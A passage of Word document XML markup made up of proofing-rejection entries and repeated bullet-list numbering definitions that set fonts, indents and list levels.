      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="EkbiIgtR">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="15Ad34bN">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="oRirKn2A">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="OVXcmc3P">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="ZNnPjZba">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="iwp8vYFA">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="bpoJnXTe">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="cp5HNTSN">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="kL6a5JyD">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="3hvn1uAX">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="6FsiCRQ3">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="HqMW7mcY">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="QLOkJmfG">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="ru8HbOiB">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="2TE4poG9">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="TLplg5vR">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="czgMCx0n">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="hb9OzA3r">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="O0osAgAB">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="eq0b3xxO">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="dqyIXp98">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="iYgarCmz">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="7WJtODb8">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="TADcPGcP">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="kD7KJDFZ">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="0DoRJrfM">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="wWFlYZ56">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="V0jBiJJ5">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="M6kL6xa1">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="3w0NWBug">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="hukkFD6w">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="e0HxJwqv">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="kpq03Wo4">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="cUHYmqcY">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="iwFUaAQq">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="dkxbEcLF">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="j8Jw1c5Z">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="hQZ2qisc">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="0J0mGPFC">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="kKTYWteW">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="3qbabBni">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="VDBkNLCb">
      <int:Rejection type="LegacyProofing"/>
    </int:Content>
    <int:Content id="7WCOSTB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C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="68F640F0"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6283" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4843" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5563" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6283" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7003" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7723" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8443" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9163" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9883" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="032E1AA0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B98AC6E"/>
    <w:lvl w:ilvl="0" w:tplc="4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059EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BC3E4E0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CB04F3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="187251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A190B91"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ECEE06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34C7D35"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="79728B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41C2B5C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E906B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115877"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1D018B4"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1799" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2519" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3239" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3959" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4679" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5399" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6119" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6839" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="151572E8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF64A8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4D4E65"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8A4CC3A"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1799" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2519" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3239" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3959" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4679" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5399" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6119" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6839" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="183A13C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFDE7316"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1079" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1799" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2519" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3239" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3959" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4679" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5399" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6119" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6839" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1A125F68"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="16541488"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>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C8D128B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE7078B0"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1799" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2519" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3239" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3959" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4679" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5399" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6119" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6839" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="219869E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43FCA8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AD0722"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C8063FB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7333EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6F7E93A2"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="298E6614"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D1ED812"/>
    <w:lvl w:ilvl="0" w:tplc="48090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1799" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2519" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3239" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3959" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4679" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="48090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5399" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="48090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6119" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="48090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6839" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
